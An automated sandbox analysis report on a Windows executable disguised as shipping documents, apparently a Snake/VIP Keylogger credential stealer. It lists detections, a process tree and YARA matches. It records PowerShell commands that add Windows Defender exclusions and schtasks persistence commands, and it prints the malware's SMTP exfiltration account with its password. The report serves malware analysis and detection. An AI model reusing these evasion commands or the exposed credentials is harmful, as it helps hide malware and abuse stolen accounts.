Edit tour

Windows Analysis Report
rShippingDocuments240384.exe

Overview

General Information

Sample name:	rShippingDocuments240384.exe
Analysis ID:	1544369
MD5:	70338f79bb11ee88003ea5f2d0d363c1
SHA1:	85d426e23b7223faacea8b78c6de345098ccfbad
SHA256:	50bcb2857ce3d005fad3479253fa1c7a8cf0cd667c16d9d7c292d9307011dadf
Tags:	exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

rShippingDocuments240384.exe (PID: 2216 cmdline: "C:\Users\user\Desktop\rShippingDocuments240384.exe" MD5: 70338F79BB11EE88003EA5F2D0D363C1)

powershell.exe (PID: 5428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 1112 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 4520 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 4684 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

tdcorV.exe (PID: 5056 cmdline: C:\Users\user\AppData\Roaming\tdcorV.exe MD5: 70338F79BB11EE88003EA5F2D0D363C1)

schtasks.exe (PID: 3324 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 5520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "marketing1@bulatpharmaceutical.com", "Password": "XRM)dWOF&~z3", "Host": "mail.bulatpharmaceutical.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "marketing1@bulatpharmaceutical.com", "Password": "XRM)dWOF&~z3", "Host": "mail.bulatpharmaceutical.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x360bb0:$a1: get_encryptedPassword 0x3a3dd0:$a1: get_encryptedPassword 0x3e6df0:$a1: get_encryptedPassword 0x360ecd:$a2: get_encryptedUsername 0x3a40ed:$a2: get_encryptedUsername 0x3e710d:$a2: get_encryptedUsername 0x3609c0:$a3: get_timePasswordChanged 0x3a3be0:$a3: get_timePasswordChanged 0x3e6c00:$a3: get_timePasswordChanged 0x360ac9:$a4: get_passwordField 0x3a3ce9:$a4: get_passwordField 0x3e6d09:$a4: get_passwordField 0x360bc6:$a5: set_encryptedPassword 0x3a3de6:$a5: set_encryptedPassword 0x3e6e06:$a5: set_encryptedPassword 0x362266:$a7: get_logins 0x3a5486:$a7: get_logins 0x3e84a6:$a7: get_logins 0x3621c9:$a10: KeyLoggerEventArgs 0x3a53e9:$a10: KeyLoggerEventArgs 0x3e8409:$a10: KeyLoggerEventArgs
00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x360b38:$a1: get_encryptedPassword 0x3a3d58:$a1: get_encryptedPassword 0x3e6d78:$a1: get_encryptedPassword 0x360e55:$a2: get_encryptedUsername 0x3a4075:$a2: get_encryptedUsername 0x3e7095:$a2: get_encryptedUsername 0x360948:$a3: get_timePasswordChanged 0x3a3b68:$a3: get_timePasswordChanged 0x3e6b88:$a3: get_timePasswordChanged 0x360a51:$a4: get_passwordField 0x3a3c71:$a4: get_passwordField 0x3e6c91:$a4: get_passwordField 0x360b4e:$a5: set_encryptedPassword 0x3a3d6e:$a5: set_encryptedPassword 0x3e6d8e:$a5: set_encryptedPassword 0x3621ee:$a7: get_logins 0x3a540e:$a7: get_logins 0x3e842e:$a7: get_logins 0x362151:$a10: KeyLoggerEventArgs 0x3a5371:$a10: KeyLoggerEventArgs 0x3e8391:$a10: KeyLoggerEventArgs
Process Memory Space: rShippingDocuments240384.exe PID: 2216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rShippingDocuments240384.exe PID: 2216	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: rShippingDocuments240384.exe PID: 2216	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: rShippingDocuments240384.exe PID: 2216	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rShippingDocuments240384.exe PID: 2216	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5584b:$a1: get_encryptedPassword 0x55a85:$a2: get_encryptedUsername 0x55678:$a3: get_timePasswordChanged 0x55775:$a4: get_passwordField 0x55861:$a5: set_encryptedPassword 0x577cf:$a7: get_logins 0x57747:$a10: KeyLoggerEventArgs 0x574dd:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 4684	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4684	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: tdcorV.exe PID: 5056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tdcorV.exe PID: 5056	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: tdcorV.exe PID: 5056	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: tdcorV.exe PID: 5056	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: tdcorV.exe PID: 5056	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x44f65:$a1: get_encryptedPassword 0x4519f:$a2: get_encryptedUsername 0x44d92:$a3: get_timePasswordChanged 0x44e8f:$a4: get_passwordField 0x44f7b:$a5: set_encryptedPassword 0x46ee9:$a7: get_logins 0x46e61:$a10: KeyLoggerEventArgs 0x46bf7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 5520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5520	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 5520	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.rShippingDocuments240384.exe.4e3a448.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rShippingDocuments240384.exe.4e3a448.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.rShippingDocuments240384.exe.4e3a448.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.rShippingDocuments240384.exe.4e3a448.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b8f0:$a1: get_encryptedPassword 0x2bc0d:$a2: get_encryptedUsername 0x2b700:$a3: get_timePasswordChanged 0x2b809:$a4: get_passwordField 0x2b906:$a5: set_encryptedPassword 0x2cfa6:$a7: get_logins 0x2cf09:$a10: KeyLoggerEventArgs 0x2cb6e:$a11: KeyLoggerEventArgsEventHandler
0.2.rShippingDocuments240384.exe.4e3a448.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x397ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38e4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x390ac:$a4: \Orbitum\User Data\Default\Login Data 0x39a8b:$a5: \Kometa\User Data\Default\Login Data
0.2.rShippingDocuments240384.exe.4e3a448.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c500:$s1: UnHook 0x2c507:$s2: SetHook 0x2c50f:$s3: CallNextHook 0x2c51c:$s4: _hook
14.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.tdcorV.exe.46bb4c0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.tdcorV.exe.46bb4c0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.tdcorV.exe.46bb4c0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.tdcorV.exe.46bb4c0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b8f0:$a1: get_encryptedPassword 0x2bc0d:$a2: get_encryptedUsername 0x2b700:$a3: get_timePasswordChanged 0x2b809:$a4: get_passwordField 0x2b906:$a5: set_encryptedPassword 0x2cfa6:$a7: get_logins 0x2cf09:$a10: KeyLoggerEventArgs 0x2cb6e:$a11: KeyLoggerEventArgsEventHandler
10.2.tdcorV.exe.46bb4c0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x397ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38e4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x390ac:$a4: \Orbitum\User Data\Default\Login Data 0x39a8b:$a5: \Kometa\User Data\Default\Login Data
10.2.tdcorV.exe.46bb4c0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c500:$s1: UnHook 0x2c507:$s2: SetHook 0x2c50f:$s3: CallNextHook 0x2c51c:$s4: _hook
10.2.tdcorV.exe.4636aa0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.tdcorV.exe.4636aa0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.tdcorV.exe.4636aa0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.tdcorV.exe.4636aa0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.tdcorV.exe.4636aa0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb2110:$a1: get_encryptedPassword 0xf5330:$a1: get_encryptedPassword 0x138350:$a1: get_encryptedPassword 0xb242d:$a2: get_encryptedUsername 0xf564d:$a2: get_encryptedUsername 0x13866d:$a2: get_encryptedUsername 0xb1f20:$a3: get_timePasswordChanged 0xf5140:$a3: get_timePasswordChanged 0x138160:$a3: get_timePasswordChanged 0xb2029:$a4: get_passwordField 0xf5249:$a4: get_passwordField 0x138269:$a4: get_passwordField 0xb2126:$a5: set_encryptedPassword 0xf5346:$a5: set_encryptedPassword 0x138366:$a5: set_encryptedPassword 0xb37c6:$a7: get_logins 0xf69e6:$a7: get_logins 0x139a06:$a7: get_logins 0xb3729:$a10: KeyLoggerEventArgs 0xf6949:$a10: KeyLoggerEventArgs 0x139969:$a10: KeyLoggerEventArgs
10.2.tdcorV.exe.4636aa0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb2d20:$s1: UnHook 0xf5f40:$s1: UnHook 0x138f60:$s1: UnHook 0xb2d27:$s2: SetHook 0xf5f47:$s2: SetHook 0x138f67:$s2: SetHook 0xb2d2f:$s3: CallNextHook 0xf5f4f:$s3: CallNextHook 0x138f6f:$s3: CallNextHook 0xb2d3c:$s4: _hook 0xf5f5c:$s4: _hook 0x138f7c:$s4: _hook
0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d6f0:$a1: get_encryptedPassword 0x70910:$a1: get_encryptedPassword 0xb3930:$a1: get_encryptedPassword 0x2da0d:$a2: get_encryptedUsername 0x70c2d:$a2: get_encryptedUsername 0xb3c4d:$a2: get_encryptedUsername 0x2d500:$a3: get_timePasswordChanged 0x70720:$a3: get_timePasswordChanged 0xb3740:$a3: get_timePasswordChanged 0x2d609:$a4: get_passwordField 0x70829:$a4: get_passwordField 0xb3849:$a4: get_passwordField 0x2d706:$a5: set_encryptedPassword 0x70926:$a5: set_encryptedPassword 0xb3946:$a5: set_encryptedPassword 0x2eda6:$a7: get_logins 0x71fc6:$a7: get_logins 0xb4fe6:$a7: get_logins 0x2ed09:$a10: KeyLoggerEventArgs 0x71f29:$a10: KeyLoggerEventArgs 0xb4f49:$a10: KeyLoggerEventArgs
0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b5ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e7cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc17ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ac4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x7de6f:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0e8f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3aeac:$a4: \Orbitum\User Data\Default\Login Data 0x7e0cc:$a4: \Orbitum\User Data\Default\Login Data 0xc10ec:$a4: \Orbitum\User Data\Default\Login Data 0x3b88b:$a5: \Kometa\User Data\Default\Login Data 0x7eaab:$a5: \Kometa\User Data\Default\Login Data 0xc1acb:$a5: \Kometa\User Data\Default\Login Data
0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e300:$s1: UnHook 0x71520:$s1: UnHook 0xb4540:$s1: UnHook 0x2e307:$s2: SetHook 0x71527:$s2: SetHook 0xb4547:$s2: SetHook 0x2e30f:$s3: CallNextHook 0x7152f:$s3: CallNextHook 0xb454f:$s3: CallNextHook 0x2e31c:$s4: _hook 0x7153c:$s4: _hook 0xb455c:$s4: _hook
10.2.tdcorV.exe.46bb4c0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.tdcorV.exe.46bb4c0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.tdcorV.exe.46bb4c0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.tdcorV.exe.46bb4c0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.tdcorV.exe.46bb4c0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d6f0:$a1: get_encryptedPassword 0x70910:$a1: get_encryptedPassword 0xb3930:$a1: get_encryptedPassword 0x2da0d:$a2: get_encryptedUsername 0x70c2d:$a2: get_encryptedUsername 0xb3c4d:$a2: get_encryptedUsername 0x2d500:$a3: get_timePasswordChanged 0x70720:$a3: get_timePasswordChanged 0xb3740:$a3: get_timePasswordChanged 0x2d609:$a4: get_passwordField 0x70829:$a4: get_passwordField 0xb3849:$a4: get_passwordField 0x2d706:$a5: set_encryptedPassword 0x70926:$a5: set_encryptedPassword 0xb3946:$a5: set_encryptedPassword 0x2eda6:$a7: get_logins 0x71fc6:$a7: get_logins 0xb4fe6:$a7: get_logins 0x2ed09:$a10: KeyLoggerEventArgs 0x71f29:$a10: KeyLoggerEventArgs 0xb4f49:$a10: KeyLoggerEventArgs
10.2.tdcorV.exe.46bb4c0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b5ac:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e7cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc17ec:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ac4f:$a3: \Google\Chrome\User Data\Default\Login Data 0x7de6f:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0e8f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3aeac:$a4: \Orbitum\User Data\Default\Login Data 0x7e0cc:$a4: \Orbitum\User Data\Default\Login Data 0xc10ec:$a4: \Orbitum\User Data\Default\Login Data 0x3b88b:$a5: \Kometa\User Data\Default\Login Data 0x7eaab:$a5: \Kometa\User Data\Default\Login Data 0xc1acb:$a5: \Kometa\User Data\Default\Login Data
10.2.tdcorV.exe.46bb4c0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e300:$s1: UnHook 0x71520:$s1: UnHook 0xb4540:$s1: UnHook 0x2e307:$s2: SetHook 0x71527:$s2: SetHook 0xb4547:$s2: SetHook 0x2e30f:$s3: CallNextHook 0x7152f:$s3: CallNextHook 0xb454f:$s3: CallNextHook 0x2e31c:$s4: _hook 0x7153c:$s4: _hook 0xb455c:$s4: _hook
0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb2110:$a1: get_encryptedPassword 0xf5330:$a1: get_encryptedPassword 0x138350:$a1: get_encryptedPassword 0xb242d:$a2: get_encryptedUsername 0xf564d:$a2: get_encryptedUsername 0x13866d:$a2: get_encryptedUsername 0xb1f20:$a3: get_timePasswordChanged 0xf5140:$a3: get_timePasswordChanged 0x138160:$a3: get_timePasswordChanged 0xb2029:$a4: get_passwordField 0xf5249:$a4: get_passwordField 0x138269:$a4: get_passwordField 0xb2126:$a5: set_encryptedPassword 0xf5346:$a5: set_encryptedPassword 0x138366:$a5: set_encryptedPassword 0xb37c6:$a7: get_logins 0xf69e6:$a7: get_logins 0x139a06:$a7: get_logins 0xb3729:$a10: KeyLoggerEventArgs 0xf6949:$a10: KeyLoggerEventArgs 0x139969:$a10: KeyLoggerEventArgs
0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb2d20:$s1: UnHook 0xf5f40:$s1: UnHook 0x138f60:$s1: UnHook 0xb2d27:$s2: SetHook 0xf5f47:$s2: SetHook 0x138f67:$s2: SetHook 0xb2d2f:$s3: CallNextHook 0xf5f4f:$s3: CallNextHook 0x138f6f:$s3: CallNextHook 0xb2d3c:$s4: _hook 0xf5f5c:$s4: _hook 0x138f7c:$s4: _hook
10.2.tdcorV.exe.45b2080.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.tdcorV.exe.45b2080.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.tdcorV.exe.45b2080.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.tdcorV.exe.45b2080.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.tdcorV.exe.45b2080.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x136b30:$a1: get_encryptedPassword 0x179d50:$a1: get_encryptedPassword 0x1bcd70:$a1: get_encryptedPassword 0x136e4d:$a2: get_encryptedUsername 0x17a06d:$a2: get_encryptedUsername 0x1bd08d:$a2: get_encryptedUsername 0x136940:$a3: get_timePasswordChanged 0x179b60:$a3: get_timePasswordChanged 0x1bcb80:$a3: get_timePasswordChanged 0x136a49:$a4: get_passwordField 0x179c69:$a4: get_passwordField 0x1bcc89:$a4: get_passwordField 0x136b46:$a5: set_encryptedPassword 0x179d66:$a5: set_encryptedPassword 0x1bcd86:$a5: set_encryptedPassword 0x1381e6:$a7: get_logins 0x17b406:$a7: get_logins 0x1be426:$a7: get_logins 0x138149:$a10: KeyLoggerEventArgs 0x17b369:$a10: KeyLoggerEventArgs 0x1be389:$a10: KeyLoggerEventArgs
0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x136b30:$a1: get_encryptedPassword 0x179d50:$a1: get_encryptedPassword 0x1bcd70:$a1: get_encryptedPassword 0x136e4d:$a2: get_encryptedUsername 0x17a06d:$a2: get_encryptedUsername 0x1bd08d:$a2: get_encryptedUsername 0x136940:$a3: get_timePasswordChanged 0x179b60:$a3: get_timePasswordChanged 0x1bcb80:$a3: get_timePasswordChanged 0x136a49:$a4: get_passwordField 0x179c69:$a4: get_passwordField 0x1bcc89:$a4: get_passwordField 0x136b46:$a5: set_encryptedPassword 0x179d66:$a5: set_encryptedPassword 0x1bcd86:$a5: set_encryptedPassword 0x1381e6:$a7: get_logins 0x17b406:$a7: get_logins 0x1be426:$a7: get_logins 0x138149:$a10: KeyLoggerEventArgs 0x17b369:$a10: KeyLoggerEventArgs 0x1be389:$a10: KeyLoggerEventArgs
10.2.tdcorV.exe.45b2080.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137740:$s1: UnHook 0x17a960:$s1: UnHook 0x1bd980:$s1: UnHook 0x137747:$s2: SetHook 0x17a967:$s2: SetHook 0x1bd987:$s2: SetHook 0x13774f:$s3: CallNextHook 0x17a96f:$s3: CallNextHook 0x1bd98f:$s3: CallNextHook 0x13775c:$s4: _hook 0x17a97c:$s4: _hook 0x1bd99c:$s4: _hook
